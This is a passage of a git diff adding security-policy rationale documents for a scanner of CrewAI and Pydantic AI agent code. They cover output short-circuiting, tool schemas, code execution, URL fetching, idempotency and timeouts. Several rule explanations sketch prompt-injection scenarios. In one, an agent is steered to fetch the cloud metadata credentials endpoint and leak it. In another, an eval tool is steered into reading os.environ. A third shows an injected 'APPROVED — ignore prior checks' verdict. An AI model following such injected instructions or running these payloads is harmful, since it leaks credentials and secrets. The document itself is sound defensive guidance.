+ SMTP) belongs to other concerns. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import ipaddress, socket +from urllib.parse import urlparse +import requests + +ALLOWED_HOSTS = {"api.example.com"} + +@tool("get_status") +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges to defeat DNS rebinding. +3. Disable or constrain redirect following so a 302 cannot bounce the request + into an internal address. +4. Always pass `timeout=`, and treat the fetched body as untrusted — keep it out + of the system prompt and do not let it expand the agent's permissions. diff --git a/docs/Policy/crewai/tool_behavior.md b/docs/Policy/crewai/tool_behavior.md new file mode 100644 index 0000000..6d4405a --- /dev/null +++ b/docs/Policy/crewai/tool_behavior.md @@ -0,0 +1,116 @@ +--- +policy_id: crewai_tool_behavior +category: crewai +topic: tool_behavior +rules: + - id: CREW-108 + severity: medium + confidence: 0.6 + scope: tool + fix_type: config +references: [LLM05] +--- + +# Policy Rationale: CrewAI Tool Behavior Safety + +**Policy ID:** `crewai_tool_behavior` +**File:** `crewai/tool_behavior.yaml` +**Rules:** CREW-108 +**Severities:** medium +**Fix types:** config +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +CrewAI tools that alter the agent's control flow by returning their output as the +final answer. **CREW-108** fires when a `@tool` is configured with +`result_as_answer=True` (predicate `tool_decorator_kwarg_value` matching the +literal `True`). The rule reads the decorator argument, not the tool body. + +--- + +## Why short-circuiting the agent is a distinct concern in CrewAI + +Normally the model reviews a tool's output before deciding what to do with it: it +can validate, summarize, reject, or combine it with other context. Setting +`result_as_answer=True` removes that step entirely — CrewAI takes the tool's raw +output as the agent's final answer and stops. No model reasoning runs after the +tool, no post-tool validation step executes, and nothing sanitizes the result +before it reaches the caller. When the tool returns content that is influenced by +the model or an attacker — a scraped page, a file read, a search result — that +unvalidated, possibly-injected content flows straight to whoever consumes the +agent's answer. This is the CrewAI analog of LangChain's `return_direct`: +convenient for a deterministic passthrough whose output is already trusted, +dangerous the moment the tool's output is not. It is an Improper Output Handling +(LLM05) problem — the agent emits a tool result as authoritative without the +validation layer that would normally stand between the tool and the caller. + +--- + +## Rule-by-rule defense + +### CREW-108 — Tool returns its output as the final answer (Severity: medium, Confidence: 0.6, Fix type: config) + +**What we detect:** a `@tool` decorated with `result_as_answer=True` (predicate +`tool_decorator_kwarg_value`). + +**Why it is flaggable:** the flag short-circuits the agent so the tool's raw +output becomes the final answer with no model review or post-tool validation. If +that output is model- or attacker-influenced, unvalidated content reaches the +caller. + +**Real-world consequence:** a `fetch_page` tool with `result_as_answer=True` is +pointed by a prompt injection at an attacker page; the page's contents — including +any injected instructions or misinformation — are returned to the user verbatim +as the agent's answer, with the model never given a chance to flag them. + +**Why severity is medium and not high:** the flag is dangerous only when the +tool's output is untrusted; with a tool whose output is already trusted and +sanitized it is a legitimate, safe optimization, so the impact is conditional +rather than inherent. **Fix type — config:** the fix is flipping a decorator +keyword, no tool-body change. **Confidence 0.6:** the rule cannot tell whether +the tool's output is trusted, so it fires on every `result_as_answer=True` +including the many deliberate, safe uses — the largest source of false positives, +which is why confidence sits at 0.6. + +--- + +## What this policy does not cover + +- Whether the tool's output is actually trusted. The rule flags the + control-flow flag, not the trust level of what flows through it, so a + deterministic passthrough of safe data fires (a deliberate false positive). +- The same short-circuit reached by other means — a tool that simply *is* the + last call the model makes achieves a similar effect without the flag and is not + matched. +- Whether the tool body sanitizes its own output before returning. A tool that + cleans its result internally still fires on the flag. +- `result_as_answer` set to a non-literal (a variable resolved at runtime) may + not match the literal-value predicate. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +# Default (result_as_answer omitted / False): the model reviews the output. +@tool("fetch_summary") +def fetch_summary(doc_id: str) -> str: + """Return the stored summary for a document. Output is reviewed by the + agent before it becomes the final answer.""" + return load_trusted_summary(doc_id) +``` + +1. Leave `result_as_answer` at its default (`False`) unless you specifically + intend to short-circuit the agent with a tool whose output is already trusted + and sanitized. +2. If you do use it, shape and sanitize the tool's output inside the tool body — + no model step or guardrail runs after it, so the body is the last line of + defense. +3. Never combine `result_as_answer=True` with a tool that fetches external + content, reads arbitrary files, or otherwise returns model-/attacker- + influenced data. diff --git a/docs/Policy/crewai/tool_definition.md b/docs/Policy/crewai/tool_definition.md new file mode 100644 index 0000000..24c9ae0 --- /dev/null +++ b/docs/Policy/crewai/tool_definition.md @@ -0,0 +1,145 @@ +--- +policy_id: crewai_tool_definition +category: crewai +topic: tool_definition +rules: + - id: CREW-001 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: CREW-002 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI Tool Definition Hygiene + +**Policy ID:** `crewai_tool_definition` +**File:** `crewai/tool_definition.yaml` +**Rules:** CREW-001, CREW-002 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for CrewAI tools defined with the `@tool` decorator from +`crewai.tools`. **CREW-001** fires when the decorated function has no docstring +(predicate `has_docstring: false`). **CREW-002** fires when the function takes +parameters but none carry type annotations (predicates `has_params: true` AND +`has_typed_params: false`). Both read the function signature CrewAI turns into +what the model sees: the docstring becomes the tool's description, the type hints +become its argument schema. + +--- + +## Why definition quality is a distinct concern in CrewAI tools + +The model never sees a CrewAI tool's implementation — it sees only the +description and argument schema CrewAI derives from the function. The model +selects which tool to call and what arguments to pass entirely from that derived +surface. A tool with no docstring reaches the model as a bare name: it cannot +tell what the tool does or when to call it, so it skips the tool or invokes it +with the wrong arguments. A tool with untyped parameters produces an +underspecified schema: the model gets no type guidance, emits arguments of the +wrong shape, and Pydantic rejects them at validation time — a silent reliability +tax on every call. There is an excessive-agency edge too (LLM06): an +underspecified schema widens the tool's input surface, so wrong-shaped +model-supplied values that slip past validation reach the tool body the author +never anticipated. The gap is not a remote-execution hole but a degradation of +the contract the model routes against, and it compounds on a retrying agent that +burns turns re-issuing mis-shaped calls. + +--- + +## Rule-by-rule defense + +### CREW-001 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a `@tool`-decorated function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** CrewAI passes the docstring to the model verbatim as the +tool's description; with none, the tool is a bare name the model cannot reason +about. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected +when the user asks a question it could have answered, or is called with a +nonsense argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable rather than silent. **Fix type — code:** adding a +docstring is a tool-source edit. **Confidence 0.9:** docstring presence is +unambiguous; the small gap covers a tool whose description is supplied another +way the predicate does not model. + +### CREW-002 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a `@tool` function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`). + +**Why it is flaggable:** CrewAI builds the argument schema from the type hints; +without them the model gets no shape guidance and emits wrongly-typed arguments +that fail validation. + +**Real-world consequence:** a `create_invoice(amount, customer)` tool with +untyped params lets the model pass `amount="twelve dollars"`; Pydantic rejects +it, the call retries, and turns are wasted before it succeeds — or it silently +coerces to the wrong value. + +**Why severity is medium and not low:** unlike a missing description, a +mis-shaped argument can reach `execute` with the wrong value and cause an +incorrect side effect, not just a skipped call — so the impact is higher than +CREW-001. **Fix type — code:** annotating parameters is a source edit. +**Confidence 0.85:** the rule fires only when *no* parameter is typed, so a +partially-typed tool is a false negative; and a tool that documents shapes in the +docstring but omits annotations still fires. + +--- + +## What this policy does not cover + +- A *partially* typed tool (some parameters annotated, some not) does not fire — + CREW-002 requires that no parameter carries a type. +- The *quality* of a docstring or a type: a one-word docstring or an overly broad + `dict` annotation satisfies the rules but barely helps the model. +- Tools whose description is supplied through a mechanism other than the + function docstring. +- Whether the schema the model sees actually matches the tool's real behavior — + a misleading-but-present docstring passes. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +@tool("create_invoice") +def create_invoice(amount_cents: int, customer_id: str) -> str: + """Create a draft invoice for a customer. + + Args: + amount_cents: Invoice total in integer cents (e.g. 1299 for $12.99). + customer_id: The customer's opaque ID, e.g. "cus_abc123". + Returns: the new invoice ID. + """ + ... +``` + +1. Write the docstring for the model, not a human maintainer: state what the + tool does, the exact inputs it expects, and what it returns. +2. Annotate every parameter with a concrete type (`int`, `list[str]`, a Pydantic + model) — prefer precise types (`amount_cents: int`) over loose ones + (`amount`). +3. Use an `Enum` or `Literal` for closed-set arguments so the model cannot emit + an out-of-range value. +4. Keep the description and the implementation in sync — a docstring that + overstates what the tool does is its own correctness hazard. diff --git a/docs/Policy/pydantic_ai/agent_safety.md b/docs/Policy/pydantic_ai/agent_safety.md new file mode 100644 index 0000000..521efe9 --- /dev/null +++ b/docs/Policy/pydantic_ai/agent_safety.md @@ -0,0 +1,226 @@ +--- +policy_id: pydantic_ai_agent_safety +category: pydantic_ai +topic: agent_safety +rules: + - id: PYD-101 + severity: low + confidence: 0.7 + scope: agent + fix_type: config + - id: PYD-102 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: PYD-103 + severity: medium + confidence: 0.75 + scope: agent + fix_type: config + - id: PYD-105 + severity: low + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM05, LLM06, LLM10] +--- + +# Policy Rationale: Pydantic AI Agent Safety + +**Policy ID:** `pydantic_ai_agent_safety` +**File:** `pydantic_ai/agent_safety.yaml` +**Rules:** PYD-101, PYD-102, PYD-103, PYD-105 +**Severities:** low, high, medium, low +**Fix types:** config, config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for the Pydantic AI `Agent(...)` constructor (normalized +`pydantic_ai_agent`). **PYD-101** fires when the agent has no validated output +type — `output_type` is absent (defaulting to `str`) or set explicitly to `str` +(predicate: `agent_kwarg_missing` OR `agent_kwarg_value` matching `str`). +**PYD-102** fires when the agent wires `CodeExecutionTool` (predicate +`agent_uses_hosted_tool_class`). **PYD-103** fires when the agent wires a native +URL fetcher — `WebFetchTool` or `UrlContextTool` (same predicate). **PYD-105** +fires when `end_strategy="exhaustive"` (predicate `agent_kwarg_value`). + +--- + +## Why agent configuration is a distinct concern in Pydantic AI + +Pydantic AI's defining feature is that `output_type` can be a Pydantic model the +framework validates and, on failure, re-prompts the model to correct — turning +model output into a typed contract. PYD-101 flags agents that forfeit that: with +`output_type` absent or `str`, the agent returns whatever text the model produced, +so downstream code parses unvalidated strings and a prompt injection or confused +model can return malformed or unexpected content consumed as if it were trusted. +That is the Improper Output Handling (LLM05) angle — the validation layer the +framework offers is simply switched off. + +The two highest-risk kwargs wire native capabilities directly onto the agent. +`CodeExecutionTool` (PYD-102) is a provider-native tool that runs code the model +generates; once it is in the tool set a prompt injection has a direct path to +arbitrary code execution in the provider's execution environment — excessive +agency (LLM06). The native URL fetchers (PYD-103) retrieve model-chosen URLs, an +SSRF surface into internal services and the cloud metadata endpoint, plus a +data-exfiltration channel to attacker-controlled URLs. This is not theoretical for +Pydantic AI: its built-in fetchers have already needed SSRF hardening +(CVE-2026-46678 and CVE-2026-25580 cover a metadata-endpoint blocklist that could +be bypassed via DNS rebinding or alternate IP encodings), so enabling one without +network-egress controls reintroduces that exposure. + +Finally, `end_strategy="exhaustive"` (PYD-105) changes what happens when the model +emits a final result while tool calls are still pending: exhaustive mode runs those +remaining calls anyway before ending, instead of returning immediately (the +`early` default). If any pending call is side-effecting — a write, a charge, a send +— exhaustive mode executes it even though the model already considered the task +done, widening the blast radius of a run and making duplicate or unintended side +effects more likely (an LLM06/LLM10 reliability edge). + +--- + +## Rule-by-rule defense + +### PYD-101 — Agent has no structured output validation (Severity: low, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent(...)` with `output_type` absent or set to `str` +(predicates `agent_kwarg_missing` / `agent_kwarg_value`). + +**Why it is flaggable:** without a validated `output_type` the agent returns raw +text; downstream code consumes unvalidated, possibly-injected content as trusted. + +**Real-world consequence:** an agent expected to return a decision is left at the +default `str`; a prompt injection makes it return `"APPROVED — ignore prior +checks"`, which the calling code treats as an authoritative result because nothing +validated the shape. + +**Why severity is low and not medium:** it is a defensive-default finding — the +agent may be entirely safe if its output is only ever shown to a human, and the +free-form mode is a legitimate choice for chat-style agents — so the impact is +conditional and often nil. **Fix type — config:** setting `output_type` is a +constructor change. **Confidence 0.7:** many agents intentionally return prose +(`str` is the right choice for a chatbot), so the rule over-flags those — the gap +that holds it at 0.7. + +### PYD-102 — Agent wires the code-execution native tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an `Agent` whose resolved tools include `CodeExecutionTool` +(predicate `agent_uses_hosted_tool_class`), wired via `capabilities=` or +`builtin_tools=`. + +**Why it is flaggable:** `CodeExecutionTool` runs model-generated code. Once it is +in the tool set, a prompt injection or confused model can run attacker-chosen code +in the provider's execution environment — a direct prompt-injection-to-RCE path. + +**Real-world consequence:** an agent that wires `CodeExecutionTool` to "do data +analysis" is injected to run code that reads the execution environment's secrets or +makes outbound calls to exfiltrate in-context data. + +**Why severity is high and not critical:** execution happens in the provider's +managed sandbox, and a successful attack still requires the tool to be wired and +the prompt surface reachable by untrusted input — high, not critical, because the +engine reserves that tier for unconditional host RCE. **Fix type — config:** the +fix is removing the tool from the agent's capability/tool list, an agent-wiring +change. **Confidence 0.85:** the class-name match cannot see whether the team has +constrained the execution environment out of band, so a few hardened uses are +over-flagged. + +### PYD-103 — Agent wires a model-driven URL-fetching native tool (Severity: medium, Confidence: 0.75, Fix type: config) + +**What we detect:** an `Agent` that wires `WebFetchTool` or `UrlContextTool` +(predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** these native tools retrieve model-chosen URLs — an SSRF +surface into internal services and the metadata endpoint, and an exfiltration +channel to attacker URLs. Pydantic AI's built-in fetchers have needed SSRF +hardening (CVE-2026-46678, CVE-2026-25580), so enabling one without egress controls +reintroduces that exposure. + +**Real-world consequence:** an agent with `WebFetchTool` is injected to fetch +`http://169.254.169.254/latest/meta-data/iam/security-credentials/`, and the +returned cloud credentials are exfiltrated through the model's next output. + +**Why severity is medium and not high:** the impact depends on the agent host's +network position (no reachable internal services or metadata endpoint, or an egress +proxy, shrinks it sharply), and the SDK's own fetchers now ship a metadata +blocklist that blunts the most direct attack — so the residual risk is real but +conditional. **Fix type — config:** drop or constrain the native fetcher and add +egress controls — no tool source edit. **Confidence 0.75:** the rule flags the +tool's presence, not a proven reachable internal target, so it over-flags agents +that only ever fetch vetted external URLs or run behind a strict egress allow-list. + +### PYD-105 — Agent retries with the exhaustive end strategy (Severity: low, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` with `end_strategy="exhaustive"` (predicate +`agent_kwarg_value`). + +**Why it is flaggable:** exhaustive mode runs still-pending tool calls after the +model has produced a final result; if any pending call is side-effecting, it fires +even though the task was already considered done. + +**Real-world consequence:** the model returns a final answer with a pending +`send_email` tool call still queued; exhaustive mode sends the email anyway, an +unintended side effect the `early` default would have skipped. + +**Why severity is low and not medium:** it only matters when pending calls are +side-effecting *and* the model finishes with calls still queued — a narrow +intersection, and harmless when every callable tool is side-effect-free. **Fix +type — config:** the fix is leaving `end_strategy` at its `early` default, a +constructor change. **Confidence 0.7:** the rule cannot tell whether the agent's +tools have side effects, so it over-flags exhaustive-mode agents whose tools are +all read-only. + +--- + +## What this policy does not cover + +- Code execution implemented by hand inside a tool body rather than via + `CodeExecutionTool` — caught by **PYD-004** (code_execution.md), not here. +- Hand-rolled URL fetches inside a tool body — caught by **PYD-005** (ssrf.md); + PYD-103 covers only the native fetcher tools. +- Whether the agent's prompt surface is actually reachable by untrusted content — + all four rules flag a configuration, not a proven injection path. +- PYD-101 cannot tell whether a `str` output is consumed by code (risky) or only + shown to a human (safe); PYD-105 cannot tell whether pending tools have side + effects. +- A native tool referenced under an alias, or a provider tool outside the listed + class set, may escape the class-name match. Whether a native tool's execution or + fetch environment is sandboxed is not visible to the match. + +--- + +## Recommendations beyond the fix + +```python +from pydantic import BaseModel +from pydantic_ai import Agent + +class Decision(BaseModel): + approved: bool + reason: str + +# Validated output; no code-execution or open-fetch native tools; early end. +agent = Agent( + "openai:gpt-4o", + output_type=Decision, # framework validates & re-prompts on failure + end_strategy="early", # skip pending tool calls once a result is final + tools=[vetted_lookup], # no CodeExecutionTool / WebFetchTool +) +``` + +1. Set `output_type` to a Pydantic model (or a typed union) wherever the result is + consumed by code, so callers receive a checked object and the framework + re-prompts on a validation failure. +2. Remove `CodeExecutionTool` from production agents; if code execution is genuinely + needed, run it in a hardened external sandbox gated behind explicit human + approval. +3. Enable a native URL fetcher only when open web access is truly required, and put + egress controls around the agent process: a host allow-list, blocked + private/link-local ranges, and a proxy that rejects internal addresses. Prefer a + purpose-built fetcher over an open one. +4. Leave `end_strategy` at `early` unless every callable tool is side-effect-free + and you specifically need the remaining calls to complete. diff --git a/docs/Policy/pydantic_ai/code_execution.md b/docs/Policy/pydantic_ai/code_execution.md new file mode 100644 index 0000000..9d80b4a --- /dev/null +++ b/docs/Policy/pydantic_ai/code_execution.md @@ -0,0 +1,121 @@ +--- +policy_id: pydantic_ai_code_execution +category: pydantic_ai +topic: code_execution +rules: + - id: PYD-004 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Code-Execution Safety + +**Policy ID:** `pydantic_ai_code_execution` +**File:** `pydantic_ai/code_execution.yaml` +**Rules:** PYD-004 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tools whose body evaluates code at runtime. **PYD-004** fires when a +tool function (defined via `@agent.tool` / `@agent.tool_plain` or the `Tool(...)` +factory) calls the bare `eval`, `exec`, or `compile` builtin (predicate +`has_code_exec_call`, a bare-builtin AST match — `re.compile` and other attribute +calls do not fire). + +--- + +## Why dynamic code execution is a distinct concern in Pydantic AI tools + +A Pydantic AI tool is exposed to the model, so the model writes or steers any +string the tool evaluates. With any model-influenced input, `eval`/`exec`/`compile` +is arbitrary code execution inside the agent process — no OS sandbox stands between +the call and the runtime's imports, file handles, and in-memory credentials. The +blast radius is the whole process: one evaluated string can read `os.environ`, +touch any file the process can reach, or spawn a subprocess. + +The Pydantic-AI-specific sharpening: this is the same arbitrary-execution +capability as the framework's built-in `CodeExecutionTool` (PYD-102), hand-rolled +inside a tool body — and it bypasses whatever sandboxing the native tool would have +applied. The native tool runs code in a provider-managed environment; an +in-process `eval` runs it directly in the agent's own Python, with full access to +the host application's process. So reaching for `eval` for convenience inside a +`@agent.tool` is strictly more exposed than using the native tool it imitates. + +--- + +## Rule-by-rule defense + +### PYD-004 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool whose body calls the bare `eval`, `exec`, +or `compile` builtin (predicate `has_code_exec_call`, an AST callee match, not a +substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`__import__('os').environ` to read secrets, or into reading/writing files the +process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier and +the exposure depends on whether the evaluated string is actually model-influenced. +**Fix type — code:** removing `eval`/`exec`/`compile` is a tool-source edit. +**Confidence 0.85:** the bare-callee match avoids the `re.compile` false positive, +but a dynamic-eval helper in another module, or evaluation via +`types.FunctionType` / `marshal` / `pickle.loads`, escapes the body-only walk. + +--- + +## What this policy does not cover + +- The native `CodeExecutionTool` wired on the agent — that is the agent-scope + concern of **PYD-102** (agent_safety.md), not a tool rule. +- Dynamic evaluation reached through a helper in another module — the walk sees + only the tool body. +- Alternative dynamic-code primitives: `types.FunctionType`, `marshal.loads`, + `pickle.loads`, `importlib`-driven loading. +- Evaluations whose argument is provably a constant literal still fire — the + predicate flags the presence of the primitive, not proof of model-control. + +--- + +## Recommendations beyond the fix + +```python +import ast +from pydantic_ai import Agent, RunContext + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def calculate(expr: str) -> str: + """Evaluate a constant arithmetic expression; runs no arbitrary code.""" + node = ast.parse(expr, mode="eval") + allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, + ast.operator, ast.unaryop) + if not all(isinstance(n, allowed) for n in ast.walk(node)): + return "error: disallowed syntax" + return str(eval(compile(node, "", "eval"))) # literals only +``` + +1. Remove `eval`/`exec`/`compile` from agent-callable tool bodies. For data math + prefer `ast.literal_eval`; reserve a constrained AST walk for arithmetic. +2. If running code is genuinely the product, isolate it in a locked-down sandbox + (no filesystem or network, hard timeout) — or use the native `CodeExecutionTool` + under explicit human approval — rather than in-process evaluation. +3. Parse structured input with a typed Pydantic schema rather than evaluating it. +4. Keep application secrets out of the process that hosts any evaluation-capable + tool, and log every evaluation with the session ID. diff --git a/docs/Policy/pydantic_ai/idempotency.md b/docs/Policy/pydantic_ai/idempotency.md new file mode 100644 index 0000000..2b687e6 --- /dev/null +++ b/docs/Policy/pydantic_ai/idempotency.md @@ -0,0 +1,129 @@ +--- +policy_id: pydantic_ai_idempotency +category: pydantic_ai +topic: idempotency +rules: + - id: PYD-007 + severity: medium + confidence: 0.55 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Mutating-Tool Idempotency + +**Policy ID:** `pydantic_ai_idempotency` +**File:** `pydantic_ai/idempotency.yaml` +**Rules:** PYD-007 +**Severities:** medium +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tools whose name implies a side effect but which take no idempotency +key. **PYD-007** fires when a tool function's name starts with one of `create_`, +`send_`, `delete_`, `post_`, `update_`, `refund_`, `charge_`, `issue_` (predicate +`name_has_prefix`) AND no parameter name contains `idempot` or is exactly +`request_id` / `txn_id` (predicate `param_name_matches`, negated). It is a +name-and-signature heuristic — it does not read the tool body. + +--- + +## Why missing idempotency is a distinct concern in Pydantic AI tools + +A mutating tool that runs twice does its side effect twice: a duplicate charge, a +double-sent message, a repeated delete. In ordinary code a developer controls how +often a function is called; in an agent the *framework* re-invokes tools. Pydantic +AI retries a tool call when the model's arguments fail validation, and the agent +loop can re-select the same tool across turns — so the same side-effecting action +can fire more than once without the author writing any retry logic. The classic +trigger is a timeout or a validation retry: the backend processed the request but +the response was lost or the arguments were re-validated, so the call repeats and +the action happens again. + +An idempotency key closes this: the tool sends a stable key the backend uses to +recognize a retried request and return the original result instead of re-executing. +Without it, the agent's own retry behavior turns a transient failure into a +duplicated real-world effect — an excessive-agency (LLM06) reliability hazard where +the agent takes a consequential action more times than intended. The protection +only holds end to end if the downstream service also honors the key; the parameter +is necessary but not sufficient on its own. + +--- + +## Rule-by-rule defense + +### PYD-007 — Mutating tool has no idempotency key (Severity: medium, Confidence: 0.55, Fix type: code) + +**What we detect:** a tool whose name begins with a mutation prefix (`create_`, +`send_`, `refund_`, …) and which has no parameter named for an idempotency key +(`*idempot*`, `request_id`, or `txn_id`). + +**Why it is flaggable:** the name signals a side effect, and Pydantic AI's +validation-retry and re-selection behavior can fire that side effect twice; without +a key there is no mechanism for the backend to deduplicate. + +**Real-world consequence:** a `charge_card(customer, amount)` tool has its +arguments re-validated after a transient model error; Pydantic AI retries, and the +customer is charged twice with no key for the processor to collapse the duplicate. + +**Why severity is medium and not high:** the duplicate fires only on a retry path +(timeout, ambiguous failure, or a validation retry), not on every call, and many +backends are already idempotent for other reasons — so the impact is real but +probabilistic rather than guaranteed. **Fix type — code:** adding an +`idempotency_key` parameter and threading it to the API is a tool-source change. +**Confidence 0.55:** this is a name heuristic, so a tool named `update_cache` that +mutates nothing fires (false positive), a side-effecting tool named +`process_payment` without a mutation prefix does not (false negative), and a tool +that achieves idempotency through an unnamed mechanism is over-flagged — the low +number reflects all three gaps. + +--- + +## What this policy does not cover + +- Side-effecting tools whose name does not start with a listed prefix + (`process_`, `apply_`, `submit_`, `transfer_`) — they are false negatives. +- Tools that achieve idempotency without a matching parameter name — e.g. by + deriving a natural key inside the body, or because the backend dedupes on a + business field. The signature heuristic cannot see body logic, so these fire + anyway. +- Read-only tools that happen to match a prefix (`update_view_count` that only + reads) — a false positive. +- Whether the downstream service actually honors the key. The rule checks for a + parameter, not that retries are truly deduplicated end to end. + +--- + +## Recommendations beyond the fix + +```python +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def charge_card(customer_id: str, amount_cents: int, idempotency_key: str) -> str: + """Charge a customer. `idempotency_key` must be stable across retries so a + re-sent request is collapsed by the processor instead of charging twice.""" + return payments.charge( + customer=customer_id, + amount=amount_cents, + idempotency_key=idempotency_key, # backend dedupes on this + ) +``` + +1. Add an `idempotency_key: str` parameter to every mutating tool and pass it + through to the backing API so a retried call is recognized and deduplicated. +2. Make the key stable for a logical operation — derive it from the operation's + inputs (e.g. a hash of customer + amount + intent) so the same retried action + reuses the same key. +3. Confirm the downstream service honors the key; an idempotency parameter the + backend ignores gives no protection. +4. Where the backend cannot dedupe, guard at the application layer (a + processed-operations table keyed by the idempotency key) before performing the + side effect. diff --git a/docs/Policy/pydantic_ai/network.md b/docs/Policy/pydantic_ai/network.md new file mode 100644 index 0000000..ea70f20 --- /dev/null +++ b/docs/Policy/pydantic_ai/network.md @@ -0,0 +1,124 @@ +--- +policy_id: pydantic_ai_network +category: pydantic_ai +topic: network +rules: + - id: PYD-006 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Tool Network Hygiene + +**Policy ID:** `pydantic_ai_network` +**File:** `pydantic_ai/network.yaml` +**Rules:** PYD-006 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Network-call hygiene inside Pydantic AI tool functions. **PYD-006** uses the +`call_without_kwarg` predicate: it fires when the tool body calls one of the +`requests.*` or `httpx.*` request functions (`get`, `post`, `put`, `delete`, +`patch`, `head`, `request`) without a `timeout=` keyword argument. A call that +already passes `timeout=` does not fire. + +--- + +## Why a missing timeout is a distinct concern in Pydantic AI tools + +A `requests.get(url)` with no `timeout` blocks until the remote responds or the +connection dies — which, against a slow or hostile server, can be forever. The tool +call runs inside the agent's run loop; a request with no timeout blocks that run +until the remote eventually responds or the connection drops, and under load this +ties up whatever runtime hosts the agent without ever surfacing the failure to the +model. The agent simply appears to freeze. + +This is an availability/excessive-agency hazard (LLM06): an unbounded external wait +gives a single slow or adversarial endpoint indefinite hold over the agent. The +hazard is sharper in Pydantic AI than in some frameworks because the agent loop is +synchronous from the model's perspective and a hung tool stalls the whole run — and +because Pydantic AI tools frequently call out to APIs the model selects, a +model-chosen slow endpoint can be reached deliberately. That combination is why the +pack rates this **high** rather than the medium a pure reliability lint would +carry: a hung outbound call is both a denial-of-service vector and a lever an +injection can pull. + +--- + +## Rule-by-rule defense + +### PYD-006 — Tool network call has no timeout (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool body that calls a `requests.*` / `httpx.*` +request function with no `timeout=` keyword (predicate `call_without_kwarg`). + +**Why it is flaggable:** without a timeout the request can hang indefinitely, and +the hung call blocks the agent run loop until the socket dies — a denial-of-service +exposure a model-chosen endpoint can trigger on purpose. + +**Real-world consequence:** a `fetch_report(url)` tool calls `requests.get(url)` +with no timeout; an injection points it at an endpoint that accepts the connection +and never responds, hanging the agent run indefinitely and, under concurrency, +exhausting the host's connections. + +**Why severity is high and not medium:** unlike a pure reliability lint, the hung +call is reachable and triggerable by model-influenced input in an agent whose run +loop blocks on it, so it is both an availability incident and an injection-pullable +lever — the pack rates it high to match that dual exposure. **Fix type — code:** +adding `timeout=` is a tool-source edit. **Confidence 0.85:** the rule looks for the +`timeout` kwarg on the recognized callees, so it over-fires when a timeout is set +another way (a session default, an `httpx.Client(timeout=...)` the call inherits) +and under-fires on request libraries outside the recognized `requests`/`httpx` set. + +--- + +## What this policy does not cover + +- Request libraries other than `requests` / `httpx` — `urllib.request`, `aiohttp`, + `urllib3`, or a bespoke HTTP client are not in the recognized callee set. +- A timeout set through a mechanism other than the per-call `timeout=` kwarg — a + `requests.Session` default, an `httpx.Client(timeout=...)` the call inherits, or a + socket-level default — the rule cannot see it and fires anyway. +- Whether the chosen timeout value is *appropriate*. A call with `timeout=600` + satisfies the rule but still hangs the agent run for ten minutes. +- *Where* the request goes — a model-controlled destination is the separate SSRF + concern of **PYD-005** (ssrf.md). PYD-006 is only about the missing timeout. + +--- + +## Recommendations beyond the fix + +```python +import requests +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def fetch_report(report_id: str) -> str: + """Fetch a report by ID from the vetted host with a tight timeout.""" + resp = requests.get( + f"https://api.example.com/reports/{report_id}", + timeout=10, # fail fast on a slow remote + ) + resp.raise_for_status() + return resp.text +``` + +1. Pass `timeout=` (typically 5–30 seconds) to every request, sized tight enough to + fail fast and loose 